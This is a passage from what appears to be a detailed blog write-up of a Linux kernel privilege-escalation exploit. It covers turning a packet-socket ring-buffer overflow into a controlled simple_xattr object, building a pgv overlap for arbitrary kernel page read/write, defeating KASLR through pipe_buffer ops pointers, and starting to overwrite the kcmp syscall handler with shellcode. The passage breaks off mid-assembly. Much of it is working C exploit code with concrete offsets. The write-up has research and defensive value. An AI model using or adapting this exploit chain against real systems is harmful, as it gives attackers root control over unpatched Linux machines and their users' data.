}</code></pre></div><p>The reclamation buffer (from the second race trigger) will land in one of these holes, with sprayed pgv arrays on both sides.</p><h4>Triggering the second race</h4><p>The exploit runs the same two-race sequence as Stage 1 &#8212; identical victim socket configuration, same mutex-barrier technique for race 1, same BPF filter + timer interrupt for race 2 &#8212; but with one difference: the packet data now contains leaked_content_simple_xattr_kernel_address (obtained from Stage 1) instead of XATTR_SIZE_MAX:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;aaccf404-9102-4d88-a850-b21e9bfe09fa&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">u8 packet_data[128] = {};
*(u64 *)(packet_data) = simple_xattr_kernel_address;</code></pre></div><p>The overflow arithmetic is identical: the 8-byte write lands at offset 24 past the reclamation block boundary, which is the 4th entry (index 3) of the adjacent pgv array &#8212; because 24 / sizeof(struct pgv) = 24 / 8 = 3.</p><p>So after the overflow:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;d2c34262-3547-47df-ab85-99341b97a24f&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">adjacent_pgv[3].buffer = leaked_content_simple_xattr_kernel_address.</code></pre></div><h4>Detecting the overflow</h4><p>The exploit iterates through all 256 sprayed ring buffers, mmap()s each one, and checks whether the data at block 3 (offset 3 &#215; PAGE_SIZE) looks like a simple_xattr:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;b37099d9-7541-4e53-b6e5-6e436d2801c3&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">for (int i = 0; i &lt; 256 &amp;&amp; !overflow_success; i++) {
    void *mem = mmap(NULL, mmap_size, PROT_READ | PROT_WRITE, MAP_SHARED,
                     spray_pg_vec_packet_sockets[i], 0);

    struct simple_xattr *simple_xattr = mem + 3 * PAGE_SIZE;
    if (is_data_look_like_simple_xattr(simple_xattr, KMALLOC_8K_SIZE)) {
        overflowed_pg_vec_packet_socket = spray_pg_vec_packet_sockets[i];
        overflow_success = true;
    }
    munmap(mem, mmap_size);
}</code></pre></div><p>The recognition heuristic checks that the rb_node pointers are valid kernel addresses (using __rb_parent() to mask the color bit), that name is a valid kernel address, and that size == 8192.</p><p>When a match is found, the exploit saves this socket as overflowed_pg_vec_packet_socket and closes all the other sprayed sockets to reclaim memory.</p><h4>The resulting primitive</h4><p>From this point, the exploit can access the leaked_content_simple_xattr kernel object at will:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;57f7f1e4-1619-487e-b800-6072cf173872&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *mem = mmap(NULL, mmap_size, PROT_READ | PROT_WRITE, MAP_SHARED,
                 overflowed_pg_vec_packet_socket, 0);
struct simple_xattr *manipulated_simple_xattr = mem + 3 * PAGE_SIZE;
// Now manipulated_simple_xattr points directly to live kernel memory</code></pre></div><p>This gives the exploit three capabilities through the &#8220;manipulated simple_xattr&#8221;:</p><ol><li><p><strong>Leak kernel addresses.</strong> The rb_node pointers in the simple_xattr point to other xattr objects in the same inode&#8217;s red-black tree. When the exploit creates a new xattr via setxattr(), the kernel inserts it into the tree and updates the existing nodes&#8217; child pointers. The exploit reads rb_node.rb_right or rb_node.rb_left to discover the new xattr&#8217;s kernel address. This is used repeatedly in Stage 3 to locate freshly allocated pages.</p></li></ol><ol start="2"><li><p><strong>Redirect the name pointer (page reclamation oracle).</strong> The exploit can overwrite manipulated_simple_xattr-&gt;name to point to any kernel address. This turns getxattr() into a boolean oracle for validating page reclamation. In Stage 3, the exploit repeatedly frees pages and tries to reclaim them with ring buffer blocks &#8212; but it needs to confirm each reclamation succeeded (some other kernel subsystem might have grabbed the page first). The technique works as follows: (1) reclaim the freed page via a ring buffer block and mmap it, (2) write a known string like &#8220;security.fake_simple_xattr_name&#8221; into the page, (3) overwrite manipulated_simple_xattr-&gt;name to point at that page&#8217;s kernel address, (4) call getxattr(filepath, &#8220;security.fake_simple_xattr_name&#8221;, ...). The kernel traverses the xattr tree, finds the manipulated xattr, dereferences its name pointer, and does strcmp() against the requested name. If the reclamation worked, the page contains the string the exploit wrote, strcmp() matches, and getxattr() succeeds &#8212; confirming the page is under the exploit&#8217;s control. If something else grabbed the page, strcmp() fails and the exploit knows to retry. The original name pointer is restored immediately after each check.</p></li></ol><ol start="3"><li><p><strong>Link fake objects into the xattr collection.</strong> The exploit modifies rb_node.rb_right or rb_node.rb_left to graft a fake simple_xattr node into the red-black tree (setting the fake node&#8217;s __rb_parent_color to point back to the manipulated xattr as its parent). When removexattr() is later called on the fake xattr, the kernel frees the page at the fake object&#8217;s address &#8212; giving the exploit a targeted page free primitive. This is the key mechanism for Stage 3&#8217;s double-overlapping ring buffer construction.</p></li></ol><h3>Stage 3: Arbitrary Page Read/Write via pgv Overlap</h3><p>Stage 2&#8217;s primitive lets the exploit read and write the fields of a single simple_xattr in kernel memory. That&#8217;s powerful, but limited &#8212; the exploit can only access one object at a fixed address. To read or write <em>any</em> kernel page, the exploit constructs a more general primitive: two ring buffers arranged so that one can overwrite the other&#8217;s pgv array entries, redirecting them to any page-aligned kernel address.</p><p>The construction has three parts: leaking two page addresses, building and linking a fake xattr that spans both pages, then freeing the fake xattr to create the overlap.</p><h4>Part 1: Cleaning up</h4><p>First, the exploit destroys the overflowed_simple_xattr from Stage 1 (the one whose size was corrupted to 65,536). It&#8217;s no longer needed &#8212; the heap read primitive it provided has been superseded by Stage 2&#8217;s direct memory access. After removal, the inode&#8217;s xattr collection contains only the leaked_content_simple_xattr, which is the object the exploit controls through the mmap&#8217;d ring buffer (the &#8220;manipulated simple_xattr&#8221;).</p><p>The exploit saves the original values of the manipulated xattr&#8217;s rb_node pointers and name so it can restore them later &#8212; the kernel&#8217;s xattr traversal code will crash if these pointers are left dangling.</p><h4>Part 2: Leaking page addresses via allocate-read-free</h4><p>The exploit needs two order-2 page addresses. It obtains each one through the same three-step pattern:</p><p><strong>Step 1: Allocate a temporary xattr.</strong> Call setxattr() on the tmpfs file to create a new simple_xattr with value_size = 8192 (order-2 pages). The kernel links it into the xattr collection, updating the manipulated xattr&#8217;s node pointers.</p><p><strong>Step 2: Read the address.</strong> Since the exploit has the manipulated simple_xattr mmap&#8217;d, it can immediately read the updated rb_node pointer to get the new xattr&#8217;s kernel address. The red-black tree may insert the new node as either a right or left child depending on the key comparison, so the exploit checks both:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;9bb624f9-f5f7-4ee8-8f17-8c04c905429c&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">setxattr(filepath, "security.leak_for_name", value, KMALLOC_8K_SIZE, XATTR_CREATE);
if (manipulated_simple_xattr-&gt;rb_node.rb_right)
    fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr-&gt;rb_node.rb_right;
else
    fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr-&gt;rb_node.rb_left;</code></pre></div><p><strong>Step 3: Free it.</strong> Call removexattr() to free the temporary xattr. Its page goes back to the order-2 freelist.</p><p>The exploit repeats this pattern twice, obtaining two addresses:</p><ul><li><p>fake_simple_xattr_name_addr &#8212; will hold the fake xattr&#8217;s name string</p></li><li><p>fake_simple_xattr_addr &#8212; will hold the fake xattr structure itself</p></li></ul><h4>Part 3: Reclaiming the freed pages with ring buffer blocks</h4><p>After each address is leaked and the temporary xattr freed, the exploit immediately reclaims the freed page with a ring buffer block:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;678e8976-4c99-47f8-a6ee-1899d12b053a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// Reclaim the freed page with a 1-block, order-2 ring buffer
alloc_pages(fake_simple_xattr_name_packet_socket, 1, PAGES_ORDER2_SIZE);</code></pre></div><p>Now the exploit can mmap() this ring buffer to read/write the page at fake_simple_xattr_name_addr. It writes the fake name string into it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;beb5fe71-f85f-4ef5-a140-2d5a71f7f7da&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *mem = mmap(NULL, PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED,
                 fake_simple_xattr_name_packet_socket, 0);
strcpy(mem, "security.fake_simple_xattr_name");
munmap(mem, PAGES_ORDER2_SIZE);</code></pre></div><p>But how does the exploit know the reclamation succeeded? The freed page might have been reused by something else entirely. The exploit <strong>writes</strong> to the reclaimed page through the newly allocated ring buffer (via mmap), but <strong>reads</strong> through the leaked address (via getxattr). If the read returns what was written, the ring buffer must have landed on the same page the leaked address points to:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;c0789f3d-6e5e-4e69-8c0a-b8cd042db1fa&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// Now read through the leaked address: redirect the manipulated xattr's
// name pointer to fake_simple_xattr_name_addr (obtained from Part 2)
manipulated_simple_xattr-&gt;name = (char *)fake_simple_xattr_name_addr;

// Ask the kernel to look up this xattr by name &#8212; the kernel will follow
// the redirected name pointer and strcmp() it against the lookup key
ssize_t ret = getxattr(filepath, "security.fake_simple_xattr_name",
                       value, manipulated_simple_xattr-&gt;size);

// Restore original name pointer
manipulated_simple_xattr-&gt;name = (char *)original_name_pointer;

if (ret == manipulated_simple_xattr-&gt;size) {
    // Success! The kernel read from the leaked address and found the string
    // we wrote via the ring buffer. The two refer to the same physical page.</code></pre></div><p>If getxattr() succeeds, the ring buffer block and the leaked address map to the same page &#8212; the exploit now controls that page&#8217;s contents. If it fails, the exploit frees the ring buffer and retries.</p><p>The same process is repeated for fake_simple_xattr_addr, using a second packet socket (fake_simple_xattr_packet_socket).</p><h4>Part 4: Building and linking the fake xattr</h4><p>With both pages reclaimed and validated, the exploit writes a fake simple_xattr structure into the page at fake_simple_xattr_addr:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;10ae6fad-9bd2-4eb5-81d8-e0a831e4d2d6&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct simple_xattr *fake_simple_xattr = mem;
fake_simple_xattr-&gt;rb_node.__rb_parent_color = leaked_content_simple_xattr_kernel_address;
fake_simple_xattr-&gt;name = (void *)fake_simple_xattr_name_addr;
fake_simple_xattr-&gt;size = KMALLOC_8K_SIZE;</code></pre></div><p>The fake xattr&#8217;s __rb_parent_color is set to the kernel address of the manipulated xattr (the leaked_content_simple_xattr from Stage 1). This is because the red-black tree removal algorithm needs to find the parent node. The rb_right and rb_left fields are left as NULL (zeroed by memset), indicating this is a leaf node &#8212; simplifying the tree removal path. The name pointer points to fake_simple_xattr_name_addr (where the string &#8220;security.fake_simple_xattr_name&#8221; lives) and size is set to 8,192 bytes.</p><p>Now the exploit links this fake xattr into the inode&#8217;s red-black tree by modifying the manipulated xattr:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;4f0a6c97-5c35-47b8-bc95-ce9480996878&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">if (is_right_node)
    manipulated_simple_xattr-&gt;rb_node.rb_right = (void *)fake_simple_xattr_addr;
else
    manipulated_simple_xattr-&gt;rb_node.rb_left = (void *)fake_simple_xattr_addr;</code></pre></div><p>The is_right_node variable tracks which child pointer was used when the temporary xattr was originally inserted (from Part 2&#8217;s second leak). The exploit reuses the same child slot, ensuring the tree structure remains consistent.</p><p>The kernel now considers this a real xattr in the collection.</p><h4>Part 5: Creating the pgv overlap</h4><p>Here is where the exploit reaches its goal. The exploit calls:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;73e76827-d874-435e-8b80-d237f6bb4ca3&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">removexattr(filepath, &#8220;security.fake_simple_xattr_name&#8221;);</code></pre></div><p>The kernel finds the fake xattr, unlinks it from the red-black tree, and frees both allocations separately:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;919a9592-4cdc-43cd-8587-44e6a652f834&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// Kernel&#8217;s simple_xattr removal path:
kfree(xattr-&gt;name);   // frees Page A (fake_simple_xattr_name_addr)
kvfree(xattr);         // frees Page B (fake_simple_xattr_addr)</code></pre></div><p>Both pages return to the order-2 freelist. But the two ring buffers that previously reclaimed these pages still have their pgv[0].buffer pointing at them &#8212; the pointers were never updated:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;b370732e-0c64-458f-a6e0-4793edba9304&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">fake_simple_xattr_name_packet_socket &#8594; pgv[0].buffer = Page A (now freed)
fake_simple_xattr_packet_socket      &#8594; pgv[0].buffer = Page B (now freed)
Order-2 freelist: [Page A, Page B]</code></pre></div><p>These are <strong>dangling</strong> pointers &#8212; an intentional use-after-free. Immediately after the free, the exploit allocates a <strong>third</strong> ring buffer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;f3c910c3-37be-450c-854e-ae822ab0bff7&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">alloc_pages(overwritten_pg_vec_packet_socket,
            MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2,  // 1025 blocks
            PAGE_SIZE);</code></pre></div><p>This ring buffer has 1,025 blocks, so its pgv array is 1025 &#215; 8 = 8,200 bytes &#8212; allocated via kcalloc() in alloc_pg_vec(), rounded up to kmalloc-8k, and served from order-2 pages (the same page order as the just-freed fake xattr pages). With two order-2 pages just freed, the page allocator grabs one of them for the pgv array &#8212; say Page A:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;28705845-88f5-4358-a03f-f4ceb690a690&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">fake_simple_xattr_name_packet_socket &#8594; pgv[0].buffer = Page A &#8592; STILL POINTS HERE
fake_simple_xattr_packet_socket      &#8594; pgv[0].buffer = Page B (still freed)
overwritten_pg_vec_packet_socket     &#8594; pgv array lives on Page A</code></pre></div><p>Page A is now <strong>simultaneously</strong> block 0 of fake_simple_xattr_name_packet_socket (stale dangling pointer) and the pgv array of the third ring buffer (new allocation). When the exploit mmaps fake_simple_xattr_name_packet_socket, the kernel looks up pgv[0].buffer, finds Page A, and maps it into userspace &#8212; but Page A now contains the third ring buffer&#8217;s pgv entries. That&#8217;s the <strong>pgv overlap</strong>.</p><p>The exploit doesn&#8217;t know in advance which page the allocator will pick, so it mmaps both dangling ring buffers and checks which one contains data that looks like a pgv array (consecutive kernel pointers):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;242ef550-b048-43d0-ae2a-8dbc0011ebed&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *mem  = mmap(NULL, PAGES_ORDER2_SIZE, ..., fake_simple_xattr_name_packet_socket, 0);
void *mem1 = mmap(NULL, PAGES_ORDER2_SIZE, ..., fake_simple_xattr_packet_socket, 0);

if (mem != MAP_FAILED &amp;&amp; is_data_look_like_pgv(mem, 1025)) {
    packet_socket_to_overwrite_pg_vec = fake_simple_xattr_name_packet_socket;
} else if (mem1 != MAP_FAILED &amp;&amp; is_data_look_like_pgv(mem1, 1025)) {
    packet_socket_to_overwrite_pg_vec = fake_simple_xattr_packet_socket;
}

packet_socket_with_overwritten_pg_vec = overwritten_pg_vec_packet_socket;</code></pre></div><p>The is_data_look_like_pgv() function checks that each entry has a valid kernel address (upper 16 bits = 0xFFFF), which matches a pgv array filled with allocated block pointers. Whichever dangling ring buffer&#8217;s mmap reveals pgv entries is the one whose page was reclaimed &#8212; it becomes the &#8220;master.&#8221;</p><h4>The resulting primitive</h4><p>The exploit now has two ring buffers in a master-puppet relationship:</p><ul><li><p><strong>packet_socket_to_overwrite_pg_vec</strong> (the &#8220;master&#8221;): Its ring buffer block overlaps the puppet&#8217;s pgv array. Mmapping it exposes the raw pgv entries as writable memory.</p></li><li><p><strong>packet_socket_with_overwritten_pg_vec</strong> (the &#8220;puppet&#8221;): Its pgv entries can be arbitrarily modified by the master. Mmapping it maps whatever pages the (now-modified) pgv entries point to.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oYxW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oYxW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 424w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 848w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 1272w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oYxW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png" width="1456" height="805" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:805,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:351944,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/189789999?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oYxW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 424w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 848w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 1272w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>To read or write any page-aligned kernel address:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;9bac391e-0f0a-410b-b689-d73d384673f6&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *abr_page_read_write_primitive_mmap(
    struct abr_page_read_write_primitive *primitive,
    u64 page_aligned_addr)
{
    // Step 1: mmap the master &#8212; its block IS the puppet's pgv array
    void *mem = mmap(NULL, primitive-&gt;overwrite_pg_vec_mmap_size,
                     PROT_READ | PROT_WRITE, MAP_SHARED,
                     primitive-&gt;packet_socket_to_overwrite_pg_vec, 0);
    struct pgv *pgv = mem;
    pgv[0].buffer = (char *)page_aligned_addr;   // redirect puppet's block 0
    munmap(mem, primitive-&gt;overwrite_pg_vec_mmap_size);

    // Step 2: mmap the puppet &#8212; block 0 now maps to target_addr
    mem = mmap(NULL, primitive-&gt;overwritten_pg_vec_mmap_size,
               PROT_READ | PROT_WRITE, MAP_SHARED,
               primitive-&gt;packet_socket_with_overwritten_pg_vec, 0);
    return mem;   // userspace pointer to arbitrary kernel page
}</code></pre></div><p>The caller receives a userspace pointer that directly maps the target kernel page. Reading from it reads kernel memory; writing to it writes kernel memory. No syscalls, no filters, no size limits &#8212; just raw memcpy. The only constraint is page alignment.</p><p>This primitive is used by Stage 4 (reading pipe buffers to find a kernel code pointer) and Stage 5 (overwriting a syscall handler with shellcode).</p><h3>Stage 4: KASLR Bypass via Pipe Buffer</h3><p>With arbitrary page read/write, the exploit can access any kernel page &#8212; but it doesn&#8217;t yet know <em>where</em> anything is. KASLR (Kernel Address Space Layout Randomization) randomizes the kernel&#8217;s base address at each boot, so the addresses of symbols like init_cred, init_fs, and syscall handlers are unknown. To defeat KASLR, the exploit needs to find a single kernel <strong>code pointer</strong> &#8212; a pointer into the kernel&#8217;s .text or .data segment &#8212; and subtract a known offset to recover the base address.</p><h4>Background: pipe buffers and anon_pipe_buf_ops</h4><p>Linux pipes are backed internally by an array of struct pipe_buffer entries, each describing one segment of data in the pipe:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;92ba3c7a-eae5-41b2-8de9-5ec1657755e9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct pipe_buffer {
    struct page *page;              // pointer to the data page
    unsigned int offset, len;       // offset and length within the page
    const struct pipe_buf_operations *ops;  // &#8594; anon_pipe_buf_ops
    unsigned int flags;
    unsigned long private;
};  // 40 bytes</code></pre></div><p>The ops field is a pointer to anon_pipe_buf_ops, a static const struct in the kernel&#8217;s .data section. Its address is always at a fixed offset from the kernel base &#8212; in the target kernel, 0x1c4a600 bytes from the base. KASLR shifts the entire kernel image, so the absolute address changes each boot, but the lower 24 bits (0xc4a600) remain constant because KASLR only randomizes the upper bits. The exploit uses these lower bits as a signature to recognize a valid pipe_buffer.</p><p>The pipe buffer array is allocated via kcalloc(nr_slots, sizeof(struct pipe_buffer)) when the pipe is created or resized. The number of slots is controlled by fcntl(F_SETPIPE_SZ), which sets the pipe&#8217;s capacity in bytes &#8212; the kernel rounds this up to the nearest power-of-two number of pages, then allocates that many pipe_buffer entries. Crucially, the ops field is only populated when data is actually written to the pipe &#8212; an empty pipe has zeroed pipe_buffer entries.</p><h4>The technique</h4><p>The exploit runs a retry loop:</p><p><strong>Step 1: Leak a page address.</strong> Using the same allocate-read-free pattern from Stage 3 &#8212; create a temporary xattr via setxattr(), read the manipulated xattr&#8217;s rb_node.rb_right or rb_node.rb_left to get the new xattr&#8217;s kernel address (pipe_buffer_addr), then removexattr() to free it. The freed page goes back to the order-2 freelist.</p><p><strong>Step 2: Reclaim with a pipe buffer array.</strong> Create a pipe with pipe2(pipe_fd, O_DIRECT) and resize it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;edc0c9d2-effa-4f50-b032-d7171cd17c44&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">fcntl(pipe_fd[0], F_SETPIPE_SZ, 256 * PAGE_SIZE);</code></pre></div><p>This tells the kernel to allocate 256 pipe_buffer entries: 256 &#215; 40 = 10,240 bytes, which exceeds kmalloc-8k and falls through to the page allocator, served from order-2 pages (16 KB) &#8212; the same page order as the just-freed xattr. If the pipe buffer array lands on the just freed page, the exploit now has a pipe_buffer array at a known kernel address.</p><p><strong>Step 3: Populate the ops pointer.</strong> Write data to the pipe to fill in the first pipe_buffer entry:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;77d4a49e-4378-4478-94ef-b3b03d0f2111&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">write(pipe_fd[1], &#8220;fillin_pipe_buffer&#8221;, 18);</code></pre></div><p>Before this write, the pipe_buffer entries are zeroed (from kcalloc). After the write, the first entry&#8217;s page points to a data page, ops points to anon_pipe_buf_ops, and len reflects the data length.</p><p><strong>Step 4: Read and identify.</strong> Use the arbitrary page read primitive from Stage 3 to map the leaked page address:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;cad87eb5-621e-4dae-a1a1-60f30834af82&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *mem = abr_page_read_write_primitive_mmap(primitive, pipe_buffer_addr);</code></pre></div><p>Then check if the data looks like a pipe_buffer. The heuristic checks two things: page must be a valid kernel pointer (upper 16 bits = 0xFFFF), and ops must have the right lower 24 bits matching anon_pipe_buf_ops. If both match, this is almost certainly a real pipe_buffer.</p><p><strong>Step 5: Calculate the kernel base.</strong></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;4eb4cb45-9ca1-477b-95bc-b03d5cfd15de&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">kernel_base = (u64)pipe_buffer-&gt;ops - anon_pipe_buf_ops_offset_from_kernel_base;
// kernel_base = ops - 0x1c4a600</code></pre></div><p>If the reclamation failed (the pipe buffer array didn&#8217;t land on the leaked page, or the data doesn&#8217;t match), the exploit closes the pipe and retries from Step 1. Once the kernel base is known, the exploit can compute the absolute addresses of init_cred, init_fs, __do_sys_kcmp, and __x86_return_thunk &#8212; everything needed for Stage 5.</p><h3>Stage 5: Privilege Escalation via Syscall Patching</h3><p>With the kernel base known and arbitrary page write available, the exploit overwrites the __do_sys_kcmp syscall handler with custom shellcode:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;d280aec2-791f-4cb9-8061-830af6416fca&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">mov rax, QWORD PTR gs:0x20c80     ; current task_struct
shl rdi, 32                       ; reconstruct init_cred from
shl rsi, 32                       ;   arg1 (high 32 bits) and
shr rsi, 32                       ;   arg2 (low 32 bits)
or  rdi, rsi
